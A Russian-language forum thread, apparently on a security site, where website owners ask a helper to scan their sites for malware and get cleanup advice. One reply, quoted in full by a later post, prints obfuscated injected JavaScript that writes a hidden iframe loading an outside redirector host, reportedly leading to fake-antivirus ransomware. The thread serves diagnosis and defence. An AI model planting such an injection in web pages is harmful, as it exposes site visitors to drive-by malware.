Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
Здравствуйте, Уважаемые!
Не могли бы вы проверить хттп://prizolov.ru/
У меня аваст на некоторые страницы ругается...
 
Surok, пока ничего подозрительного не вижу. Можно скриншет с алертом и ссылку по которой происходит срабатывание антивируса.
 
Здравствуйте!
Проверьте плиз и мой сайт на вирус там скорей всего либо фрейм, скрипт или JS.
Вот сайт design-studio.at.ua

Заранее спс
 
vicik_SH, необходимо больше информации. Сейчас я не вижу вредоносного кода.

Полезные сылки по вашему ресурсу.
1
2

Вечером попробую провести более глубокий анализ с тестовой машины.
 
А если я пришлю Вам по АСЕ или по мылу HTML шаблон чтоб Вы проверили его или нет в нём вредоносного скрипта или JS файла, ато хочу поменять Дизайн а тут такое.
P.S - Когда ставлю тот шаблон то слева шрифт нормальный а с правой стороны во всех блоках он чуток "жирный"
 
vicik_SH, хорошо.

akok<at>pisem.net с указанной ссылкой на тему. (at=@)

Добавлено через 2 часа 16 минут 47 секунд
vicik_SH, ответ отправил мылом.
 
Здравствуйте! проверьте пожалуйста на наличие вирусов ввв.fxstart-forum.org . Кажись там снова завелась зараза, которая редиректит на хттп://armadaneo.info/0/go.php?sid=2#post40889.
 
Последнее редактирование модератором:
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP: 
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }


Который редиректит на
Код: 
http://****mma.com/newspost/in.php
Где сидит редирект на
Код: 
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).
 
akoK написал(а):
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP: 
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }


Который редиректит на
Код: 
http://****mma.com/newspost/in.php
Где сидит редирект на
Код: 
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).
Нажмите для раскрытия...

Спасибо!!!
 
araan515, это специально веб мастер столько порно набросал?

Добавлено через 1 минуту 38 секунд
Прошу простить, но у меня нет желания разбирать сайт с подобным рекламным контентом.

Спасибо за понимание.
 
Добрый день! Помогите вылечить сайт ввв.mebellina.com
Аваст ругается на JS Downloader EX, на HTML:Illframe...
Что делать??? ЗАРАНЕЕ СПАСИБО
 
В настоящее время сайт Mebellina.com находится в разработке.
Нажмите для раскрытия...


posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
 
akoK написал(а):
posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
Нажмите для раскрытия...
Пришлось пока сменить главную страницу на сообщение о работах на сайте... Антивирус Аваст стоит. Вообще как лечатся сайты от вирусов? Какой-нибудь софт есть? Скрипты?
 
Подходы стандартны.

Проверки html страницы на наличия "вкраплений"

Проверка файлов на FTP и сравнение с исходниками.

Ну а в начале обязательно сменить пароль на FTP (и больше не хранить его в файл менеджерах)

Добавлено через 48 секунд
posokhoff написал(а):
Антивирус Аваст стоит.
Нажмите для раскрытия...
Иногда ругается на рекламу.
 
Проверьте плиз сайт нттп smartall.ru KIS 9.0 ругается на Exploit.Win32.Pidief.cvy. Если реально есть то объясните как решить проблему ! буду благодарен !
 
smartall, сейчас есть проблемы? На первый взгляд чисто.
 

Похожие темы

N
сайт рухнул в поиске, помогите проверить на вредоносное по
Ответы
7
Просмотры
2K
akok
akok
magirus
  • Закрыта
прошу проверить сайт kazus.ru
Ответы
2
Просмотры
3K
magirus
magirus
BLO100
  • Закрыта
Прошу проверить сайт mafcup.ucoz.ru/
Ответы
5
Просмотры
3K
akok
akok
Назад
Сверху Снизу